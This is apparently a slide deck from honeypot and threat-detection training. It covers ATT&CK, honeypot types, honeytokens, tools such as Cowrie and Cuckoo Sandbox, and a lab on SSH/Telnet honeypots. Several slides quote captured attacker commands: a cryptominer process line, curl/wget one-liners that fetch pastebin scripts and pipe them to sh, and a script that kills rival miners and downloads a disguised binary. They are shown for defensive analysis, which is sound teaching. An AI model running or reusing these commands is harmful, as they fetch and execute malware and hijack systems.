Upload
others
View
6
Download
0
Embed Size (px)
Citation preview
The Cuckoo’s Egg – Clifford Stoll • Book published in 1989 based on events that took place a few years
before that • 1986 – over 10 months of investigations • $0.75 accounting error
• First person account of the hunt for a computer hacker who broke into the Lawrence Berkeley National Lab (LBNL)
• Story about o Unauthorised Accesso Vulnerability exploitation o Lateral Movement o Exfiltration o Detection / Monitoring o Deceptiono Collaboration o History of the Internet
• TL;DR o https://youtu.be/1h7rLHNXio8 (talk by Clifford Stoll) o https://en.wikipedia.org/wiki/The_Cuckoo%27s_Egg
3
Perspective – Adversary Tactics and Techniques • Mitre Att&ck Framework• Tactics – what are the goals of the adversary?• Technique – how do they do it? • Subject to:
o Resourceso Platforms
• Can we used this knowledge for detection?o Observe Adversaries Behaviouro Techniques, Tactics and Procedures (TTPs)o Deploy in prevention, detection, response
https://attack.mitre.org
4
Your Adversaries
Your Assets Your Systems
MotivesTargets
InfrastructureBehaviour
Reference: https://published-prd.lanyonevents.com/published/rsaus19/sessionsFiles/13884/AIR-T07-ATT%26CK-in-Practice-A-Primer-to-Improve-Your-Cyber-Defense-FINAL.pdf 5
Reference: https://published-prd.lanyonevents.com/published/rsaus19/sessionsFiles/13884/AIR-T07-ATT%26CK-in-Practice-A-Primer-to-Improve-Your-Cyber-Defense-FINAL.pdf 6
www-data 17838 0.0 0.0 4452 636 ? S Mar20 0:00 sh -c /bin/bash -i -c '( while true ; do /var/www/[truncated]default/files/media-icons/xm2sg -l /var/www/[truncated]/files/media-icons/out.txt -o pool.minexmr.com:4444 -u 49DmzgK76Bo8WUa4LzTMs9TuT4Pj5FwM4FKuaNR1LmNvSPbPcTFi1ZsbVjJcQDY5hZ9i18A88g86TfdXi83P4uEoGyD5eTc.0+10000 -k >& /dev/udp/127.0.0.1/1 0>&1 ; if [ ! -f /var/www/[truncated]/files/media-icons/xm2sg ] || [ $? -eq 126 ]; then break; fi; sleep 1 ; done )
8
Questions
• How did the attacker discover the host & vulnerabilities?• How did the attacker gain initial foothold?
oWhat was the vulnerability exploited? oWhat tools did they use?
• How did the attacker maintain persistence?• What was the actual payload?
oWere there any artefacts?• What are the indicators of compromise?
oCan we map the adversaries infrastructure • Can we do something about this?
9
Learning from compromised systems
• Can be a bit tricky or complicated • Production
oReal data / services o In principle should be hardened
• What ifoWe can emulate real systems o ‘Attract’ adversaries oObserve and collect information oControlled environment
10
Honeypots
• Know your enemy oHow can we defend against an enemy, when we don’t even know who the
enemy is? (Lance Spitzner, 1999 – The Honeynet Project)
• Purpose o To learn the tools, tactics and motives involved in computer and network
attacks, and share the lessons learned - (Mission Statement, The Honeynet Project)
o Today : TTPs – Tactics, Techniques and Procedures
11
Honeypots and Honeynet
• A honeypot is an information system resource whose value lies in the unauthorized or illicit use of that resource
• Honeypot systems have no production value, so any activity going to or from a honeypot is likely a probe, attack or compromise
• A honeynet is simply a network of honeypots • Information gathering and early warning are the primary benefits to
most organisations
12
Honeypot and Honeynet Types
• Low-Interaction (LI) • Emulates services, applications and OS’s• Easier to deploy/maintain, low risk, but only limited information
• High-Interaction (HI) • Real services, applications and OS’s • Capture extensive information, but higher risk and time intensive to maintain
13
Honeypot and Honeynet Types
• Server Honeypots • Listen for incoming network connections • Analyse attacks targeting host’s users, services and operating systems
• Client Honeypots • Reach out and interact with remote potentially malicious resources • Have to be instructed where to go to find evil • Analyse attacks targeting clients and users
14
Honeypot and Honeynet Pros / ConsPros
• Simple• Collect small data sets of
high value • Few False Positives • Catch new attacks • Low False Negatives • Can beat encryption • Minimal hardware • Real time detection /
alerting
Cons
• Potentially complex • Need data analysis • Detection by attackers• Risk from compromises • Legal concerns • False negatives• Potentially live 24/7 • Operationally intensive
15
Recap
Honeypots: Computer resource(s) to be probed and/or attacked
17
Evilness
Malware
Badness
Noise
Why would you want to do this? • Threat Modeling
o What are you trying to detect o What are your concerns?
• By right, you should not expect any real activity or traffic to/from/in your honeypot
• Detect anomalous activities in your network or system? • Infected / Compromised computers • Misconfiguration
• Learn about attacks in the wild (research) • Especially if you can scale the deployment• Attackers and attacker techniques • Information Sharing opportunities • Improve overall Security
18
Generic ‘Network-based Attack’ Pattern
19
Honeypot (Target)
Host1 Host 2
1
2
(Or) 21. Connection
initiated to Honeypot
2. Connect Back / Call-Home
What can you learn?
• Hosts that are trying to connect / scan you • Potentially already compromised or infected • Such as IP address • Targets that adversaries are going after
• Techniques o Lateral movement o Hiding in plain sight
• Scripts, binaries, executables and other artifacts • Droppers / Payloadds• Remote control scripts• Malware samples
20
Example of Client-based Honeypot
21
Honeypot
(Client-Side) Target
1. Honeypot initiate connection
2. Analyse response
Controlled Environment
• It is critical to ensure that honeypot is not: o Abused i.e. attack another host
• Capture activities and artifacts for analysis • Sandbox
o Services emulation that provides interaction o OS hardened and configured to capture activities
• Additional controls o Firewall / ACLs o Intrusion Detection Systems / Network Security Monitoring
• Must be balanced to make the system ‘realistic’
22
What you can learn?
• Learn about hosts / computers that are hosting malicious contents. oDrive-by downloads
• Checking for malicious codes within: o <Iframes> o Javascripto Flasho JAVA appletoPDFoOther web content
23
Artifacts
• 2010:09:14:07:13:10 < honeypot> 2010-09-14 07:19:27 GMT 184.y.z.144 a05dfd7cca7771a7565a154d65f05ea2http://domain.lv/inx/fx29id1.txt????
• 2010:09:14:07:13:11 < honeypot> 2010-09-14 07:19:30 GMT 184.y.z.144 8dcad47f3e32e7dc1aee59167e67c601http://domain.lv/inx/fx29id2.txt?????
25
Honeytokens
• A honeytoken is data or a computing resource that exists for the purpose of alerting you when someone accesses it
• Deception -> Detection• How do I know if there’s an adversary in my network already?
27
Scenario
• Adversary _already_ inside your infrastructure or valueable target
• Detection on hosts & strategic locations
• Multiple Forms: o Usernames / Passwords o URL / Links o Files o Web Pages o Etc
• Adversary use / open tokens and announce their presence
28
Implementation
• CanarytokensoCanarytokens.org by Thinks oOpensource Source (on Github) ohttps://github.com/thinkst/canarytokens
• Dcept by SecureworksoOpensourceoActiveDirectoryohttps://github.com/secureworks/dcept
oCommercial Solutions are available
32
High Interaction Honeypot
• Think about your goals and objectives first
• Possible scenario• Setup a real system and make give it an IP address (so it is reachable to
something) • i.e. Install a Windows, Linux, Unix server
• Challenging to control & manage• What if attacker use system to launch attack to other systems • Keeping the computer in a usable state
34
Some Examples
• Dionaea (Malware) :http://dionaea.carnivore.it/
• Cowrie : https://github.com/cowrie
• Kippo - SSH honeypot :https://code.google.com/p/kippo/
• Glastopf – Web Honeypot : http://glastopf.org/
• Ghost – USB Honeypot • https://code.google.com/p/ghost-usb-honeypot/
• Thug – Client Honeypot • https://github.com/buffer/thug
35
Dionaea
• 2nd Generation low interaction honeypot• Python, runs on *NIX• IPv6 Support
• Goals• Detect both known and unknown attacks • Better protocol awareness• Vulnerability modules in scripting language • Shell code detection using LibEmu
• Check out http://dionaea.carnivore.it• Learn about attacks, malware and many more
36
Cowrie
• Emulate SSH server / Telnet Server • Allow ‘attacker’ to log-in using credentials (username and password) • Environment allow limited commands – i.e. ping, who, and wget• Record activities (keylog) of attackers and their activities
37
Glastopf Web Honeypot
• Minimalistic web server written in Python • Scans incoming HTTP requests strings • Checks for remote file inclusion (RFI), local file inclusion (LFI) and SQL
injection • Signatures and dynamic attack detection • Attempt to download attack payloads • Search keyword indexing to draw attackers• MySQL DB plus web console• Integration with botnet monitoring & sandbox • Check out Glastopf.org
38
Ghost
• USB Honeypot • Runs on Windows• Many malware spread across systems using thumbrive (and bypass
network containment strategies) • i.e. Stuxnet, Conficker
• Trick malware into thinking that a USB Thumbrive has been inserted• Captures malware written on USB • More: https://code.google.com/p/ghost-usb-honeypot
39
Thug
• Low Interaction Client-based honeypot to emulate web browser • Browser Personalities (i.e. IE)• Discovering Exploit Kits, Malicious Websites
• Python vulnerability modules: activeX controls, core browser functions, browser plugins
• Logging: flat file, MITRE MAEC format, mongoDB, HPFeeds events + files • Testing: successfully identifies, emulates and logs IE WinXP infections and
downloads served PDFs, jars, etc from Blackhole & other attack kits• More information
• http://www.honeynet.org/node/827
40
Cuckoo Sandbox
• Automated Malware Analysis System • Why not just use Anti-Virus?
• Analyze Windows executables, DLL files, PDF documetns, Office documents, PHP Scripts, Python Scripts and Internet URLs
• Windows guest VMs in Virtual Box Linux • Windows hooking / driver plus python modules for extracting and
analysing sample executions
42
Cuckoo Sandbox (2)
• Trace of relevant win32 API calls performed • Dump network traffic generated (pcap) • Creation of screenshots taken during analysis • Dump of files created, deleted and downloaded by the malware
during analysis • Extract trace of assembly instructions executed by malware process • http://www.cuckoosandbox.org/• http://www.malwr.com
43
Visualization
• Many of the tools do not really have a GUI • Reporting / Presentation is key • Essentially centralise and visualize logs
o Splunk o ElasticStack
44
APNIC Community Honeynet Project • Context
• Part of network security training – using honeypots for visualizing network security attacks / threats
• Lots of interests to deploy and ‘learn more’ after the training • Opportunity to learn, share data and more!
• Collaboration • Partners deploy honeypots, APNIC runs the backend • Information collected among partners • Explore opportunities to learn more & connect with HP
communities• Outcomes
• 15-ish honeypots in AP region (more to come) since 2017 • Shout-outs: GEMNET (MN), TCC (Tonga), MoH (WS), MYREN (MY)• DASH, collaboration with our Product Team
45
The Honeynet Project
• Started in 2000 • Know Your Enemy white paper http://old.honeynet.org/papers/enemy/
• The platform for those interested in running, building and learning from honeypots
• http://www.honeynet.org
• Many Chapters from around the world • Annual Conference • Tools • GSOC
47
Consider!
• Installing and playing with Honeypots to learn about security
• Deploying it internally to catch malicious activities
• Joining the Honeynet Project
• Sharing your experience and knowledge
• Happy Honeypotting!
48
Lab Session
1. Setting up telnet/ssh honeypot (Cowrie)
50
X
honeypot sensor(You are here)
Mothership (logging & processing) Elkstack / Kibana
BtCIRTpot
Interesting Link: http://185.x.y.z/ssh1.txt
Compromise over Telnet and SSH
Username and PasswordsAttempts
Source Countries
53
Content - one-liners
(curl -fsSL hxxps://pastebin.com/raw/xmxHzu5P||wget -q -O-hxxps://pastebin.com/raw/xmxHzu5P)|sed -e 's/\r//g'|sh
(curl -fsSL hxxps://pastebin.com/raw/CBEphEbb||wget -q -O-hxxps://pastebin.com/raw/CBEphEbb)|sed 's/\r//’|sh
(curl -fsSL hxxps://pastebin.com/raw/Zk7Jv9j2||wget -q -O-hxxps://pastebin.com/raw/Zk7Jv9j2)|sed -e 's/\r//g'|sh
54
What Is the content of the URL (on pastebin) - #1ps -ef|grep -v grep|grep hwlh3wlh44lh|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep Circle_MI|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep get.bi-chi.com|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep hashvault.pro|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep nanopool.org|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep /usr/bin/.sshd|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep /usr/bin/bsd-port|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep "xmr"|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep "xig"|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep "ddgs"|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep "qW3xT"|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep "wnTKYg"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "t00ls.ru"|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep "sustes"|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep "thisxxs"|awk '{print $2}' | xargs kill -9ps -ef|grep -v grep|grep "hashfish"|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep "kworkerds"|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep "/tmp/devtool"|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep "systemctI"|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep "kpsmouseds"|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep "kthrotlds"|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep "kintegrityds"|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep "suolbcc"|awk '{print $2}'|xargs kill -9ps aux|grep -v grep|grep -v khugepageds|awk '{if($3>=80.0) print $2}'|xargs kill -9apt-get install curl -y||yum install curl -y||apk add curl -yapt-get install cron -y||yum install crontabs -y||apk add cron -ysystemctl start crondsystemctl start cronsystemctl start crontabservice start crondservice start cronservice start crontab
55
[Snip]if [ ! -f "/tmp/.X11unix" ]; then
ARCH=$(uname -m)if [ ${ARCH}x = "x86_64x" ]; then
(curl --connect-timeout 30 --max-time 30 --retry 3 -fsSLhxxp://sowcar.com/t6/696/1554470365x2890174166.jpg -o /tmp/kerberods||wget--timeout=30 --tries=3 -q hxxp://sowcar.com/t6/696/1554470365x2890174166.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSLhxxps://pixeldrain.com/api/file/t2D_WbHk -o /tmp/kerberods||wget --timeout=30 --tries=3 -q hxxps://pixeldrain.com/api/file/t2D_WbHk -O /tmp/kerberods) && chmod +x /tmp/kerberods
[snip]
56
Digging in Further – what can we learn about the indicators (filename, URL, IP address)
Filename: 1554470365x2890174166.jpg
SHA256 = 74becf0d1621ba1f036025cddffc46d4236530d54d1f913a4d0ad488099913c8
https://www.hybrid-analysis.com/sample/74becf0d1621ba1f036025cddffc46d4236530d54d1f913a4d0ad488099913c857
The Big Picture
Attacking Host
[IP Address]
HoneypotPastebin
1. Attacking host bruteforce and gain access 2. Download malicious script 3. Execute malicious script
o Honeypot won’t execute the script but we have a copy of the malware sample
o What is the malware doing? 59
Attacking IP – what do we know about it?
• DShield IP Reputation Summary
IP: x.y.z.44 Reputation: Suspicious Network: x.y.z.0/19 AS: 17660 AS Name: DRUKNET-AS DrukNet ISP, AS Country: BT AS Abuse Contact: [email protected][SNIP]Threat Feeds: 4
Source: DSHIELD
61